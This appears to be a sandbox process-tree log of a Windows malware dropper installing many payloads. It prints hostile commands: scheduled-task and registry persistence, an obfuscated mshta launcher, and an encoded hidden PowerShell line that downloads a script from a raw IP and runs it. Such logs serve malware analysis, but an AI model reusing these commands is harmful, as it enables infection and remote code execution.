C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1944 /prefetch:18⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:18⤵PID:7732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9204 /prefetch:18⤵PID:10788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:18⤵PID:7236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:18⤵PID:10180
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09c42cad92c20f79.exe4⤵PID:3924
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09c42cad92c20f79.exeWed09c42cad92c20f79.exe5⤵
- Executes dropped EXE
PID:2212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 2406⤵
- Program crash
- Checks processor information in registry
PID:3300
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09db0d52c38.exe4⤵PID:1508
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09db0d52c38.exeWed09db0d52c38.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3320 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 19446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6824
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe4⤵PID:2596
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09977fdc12334.exeWed09977fdc12334.exe5⤵
- Executes dropped EXE
PID:3948 -
C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"C:\Users\Admin\Pictures\Adobe Films\ntvQls6W0Z9SGx99cektYOrz.exe"6⤵
- Executes dropped EXE
PID:5500
-
-
C:\Users\Admin\Pictures\Adobe Films\jbxxMselF7ZbInsUkMPdKh9r.exe"C:\Users\Admin\Pictures\Adobe Films\jbxxMselF7ZbInsUkMPdKh9r.exe"6⤵
- Executes dropped EXE
PID:1988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 2767⤵
- Program crash
PID:8048
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"C:\Users\Admin\Pictures\Adobe Films\gcqDb5zSn7BE_dUbS8yv3WOT.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4984 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2260
-
-
C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"C:\Users\Admin\Documents\hhRo_PY9JOjFbOXY45EnaDd8.exe"7⤵PID:4364
-
C:\Users\Admin\Pictures\Adobe Films\IEObGDEzFQtHW3zNznFK1dXO.exe"C:\Users\Admin\Pictures\Adobe Films\IEObGDEzFQtHW3zNznFK1dXO.exe"8⤵PID:2608
-
-
C:\Users\Admin\Pictures\Adobe Films\PHNkeRSrHp1xLWHoFmTnx6qg.exe"C:\Users\Admin\Pictures\Adobe Films\PHNkeRSrHp1xLWHoFmTnx6qg.exe"8⤵PID:7556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 17289⤵
- Program crash
PID:8048
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iyNQnVOAzpWstmRh0RYo_sir.exe"C:\Users\Admin\Pictures\Adobe Films\iyNQnVOAzpWstmRh0RYo_sir.exe"8⤵PID:7548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 2809⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2984
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jWPcmwBpFAECsMFY3BorBrqI.exe"C:\Users\Admin\Pictures\Adobe Films\jWPcmwBpFAECsMFY3BorBrqI.exe"8⤵PID:7720
-
-
C:\Users\Admin\Pictures\Adobe Films\Ga2XGzxOu7DtE8i1v4n88R7k.exe"C:\Users\Admin\Pictures\Adobe Films\Ga2XGzxOu7DtE8i1v4n88R7k.exe"8⤵PID:7396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 2449⤵
- Program crash
- Checks processor information in registry
PID:5908
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"8⤵PID:7900
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:7620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\1wpMgPxBb0rpgylDEVM8FTrO.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:5112
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "1wpMgPxBb0rpgylDEVM8FTrO.exe"11⤵
- Kills process with taskkill
PID:3820
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"8⤵PID:8068
-
C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe"C:\Users\Admin\Pictures\Adobe Films\Cm5c7bP8UuesESgVtGU2jbXU.exe" -u9⤵PID:5028
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"8⤵PID:7888
-
C:\Users\Admin\AppData\Local\Temp\is-EA9EE.tmp\kShuz28BBCUnH_NSSeWHruw8.tmp"C:\Users\Admin\AppData\Local\Temp\is-EA9EE.tmp\kShuz28BBCUnH_NSSeWHruw8.tmp" /SL5="$40272,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kShuz28BBCUnH_NSSeWHruw8.exe"9⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\is-CCK6P.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-CCK6P.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6500 -
C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe"C:\Program Files\Windows Photo Viewer\VGZXDYHCPN\foldershare.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:5972
-
-
C:\Users\Admin\AppData\Local\Temp\76-91592-c72-3c88c-827d976eeb7eb\Gufiwylaehu.exe"C:\Users\Admin\AppData\Local\Temp\76-91592-c72-3c88c-827d976eeb7eb\Gufiwylaehu.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6168 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵PID:6044
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵PID:8120
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵PID:7712
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵PID:11408
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵PID:11324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵PID:12120
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵PID:3016
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵PID:6324
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵PID:7100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471813⤵PID:6916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4d-69de5-3a2-74ea8-7aeff9e22a1d3\Megisheqyha.exe"C:\Users\Admin\AppData\Local\Temp\4d-69de5-3a2-74ea8-7aeff9e22a1d3\Megisheqyha.exe"11⤵PID:8188
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exe /eufive & exit12⤵PID:11112
-
C:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ubbhtfjq.tl5\GcleanerEU.exe /eufive13⤵PID:7692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 24014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8920
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exe /qn CAMPAIGN="654" & exit12⤵PID:11924
-
C:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exeC:\Users\Admin\AppData\Local\Temp\23biiova.jmw\installer.exe /qn CAMPAIGN="654"13⤵PID:6848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe & exit12⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exeC:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe13⤵PID:6240
-
C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe"C:\Users\Admin\AppData\Local\Temp\bzzrcueh.sos\any.exe" -u14⤵PID:768
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exe /mixfive & exit12⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fjn0wu52.tbp\gcleaner.exe /mixfive13⤵PID:6472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 24014⤵
- Program crash
- Checks processor information in registry
PID:8224
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tie4k5dz.t0a\autosubplayer.exe /S & exit12⤵PID:6292
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lmWL8_fCaR7KpxPFWCpSZATT.exe"C:\Users\Admin\Pictures\Adobe Films\lmWL8_fCaR7KpxPFWCpSZATT.exe"8⤵
- Loads dropped DLL
PID:8148 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:7324 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵PID:1992
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ffcc552dec0,0x7ffcc552ded0,0x7ffcc552dee011⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5104
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,3647991501014532599,7271685998684445581,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1992_1247375866" --mojo-platform-channel-handle=1724 /prefetch:811⤵PID:9164
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wppjUuKifwe5OKIA6JpZTWg9.exe"C:\Users\Admin\Pictures\Adobe Films\wppjUuKifwe5OKIA6JpZTWg9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4304
-
-
C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"C:\Users\Admin\Pictures\Adobe Films\eOX7_Qwa7pGMEb9wbMNxU4JT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2876
-
-
C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"C:\Users\Admin\Pictures\Adobe Films\YVY34vY7MvHUNmB1dwA2RZLa.exe"6⤵
- Executes dropped EXE
PID:5964 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1600
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2o0JrOSDBo9q9SSTMzVCyTia.exe"C:\Users\Admin\Pictures\Adobe Films\2o0JrOSDBo9q9SSTMzVCyTia.exe"6⤵
- Executes dropped EXE
PID:5048
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe4⤵PID:3416
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe5⤵
- Executes dropped EXE
PID:2632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe4⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe4⤵PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe4⤵PID:2916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed096a1bff61.exe4⤵PID:5096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1568
-
-
-
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:6560 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\m9KuYRLsEx_AWLqP1mBvqrgu.exe"3⤵PID:4652
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵PID:936
-
-
C:\Users\Admin\AppData\Local\Temp\655.exeC:\Users\Admin\AppData\Local\Temp\655.exe2⤵
- Suspicious use of SetThreadContext
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\655.exeC:\Users\Admin\AppData\Local\Temp\655.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7084
-
-
-
C:\Users\Admin\AppData\Local\Temp\722F.exeC:\Users\Admin\AppData\Local\Temp\722F.exe2⤵PID:7188
-
-
C:\Users\Admin\AppData\Local\Temp\7CB0.exeC:\Users\Admin\AppData\Local\Temp\7CB0.exe2⤵PID:5900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:11772
-
-
-
C:\Users\Admin\AppData\Local\Temp\9615.exeC:\Users\Admin\AppData\Local\Temp\9615.exe2⤵PID:8732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8732 -s 2803⤵
- Program crash
PID:8244
-
-
-
C:\Users\Admin\AppData\Local\Temp\B7F6.exeC:\Users\Admin\AppData\Local\Temp\B7F6.exe2⤵PID:9640
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵PID:11036
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵PID:11944
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵PID:3948
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
PID:7108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1430.exeC:\Users\Admin\AppData\Local\Temp\1430.exe2⤵PID:11620
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"3⤵PID:1940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"3⤵PID:240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp3⤵PID:5484
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\xtmp4⤵
- Views/modifies file attributes
PID:6980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt3⤵PID:1156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat3⤵PID:5576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat"3⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe"3⤵PID:2476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat "C:\Users\Admin\AppData\Local\Temp\1430.exe"3⤵PID:8476
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat "C:\Users\Admin\AppData\Local\Temp\1430.exe"4⤵PID:8612
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA5⤵
- Blocklisted process makes network request
PID:8692 -
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs6⤵PID:5916
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp42765.bat"3⤵PID:9948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp40815.exe"3⤵
- Enumerates system info in registry
PID:8244
-
-
-
C:\Users\Admin\AppData\Local\Temp\3DD1.exeC:\Users\Admin\AppData\Local\Temp\3DD1.exe2⤵PID:6296
-
-
C:\Users\Admin\AppData\Local\Temp\7D0E.exeC:\Users\Admin\AppData\Local\Temp\7D0E.exe2⤵
- Drops file in Program Files directory
PID:6048 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 2763⤵
- Program crash
- Enumerates system info in registry
PID:10692
-
-
-
C:\Users\Admin\AppData\Local\Temp\8471.exeC:\Users\Admin\AppData\Local\Temp\8471.exe2⤵PID:7248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7248 -s 2963⤵
- Program crash
- Checks processor information in registry
PID:3704
-
-
-
C:\Program Files (x86)\U1bjp\bt1htnhplf.exe"C:\Program Files (x86)\U1bjp\bt1htnhplf.exe"2⤵PID:6948
-
-
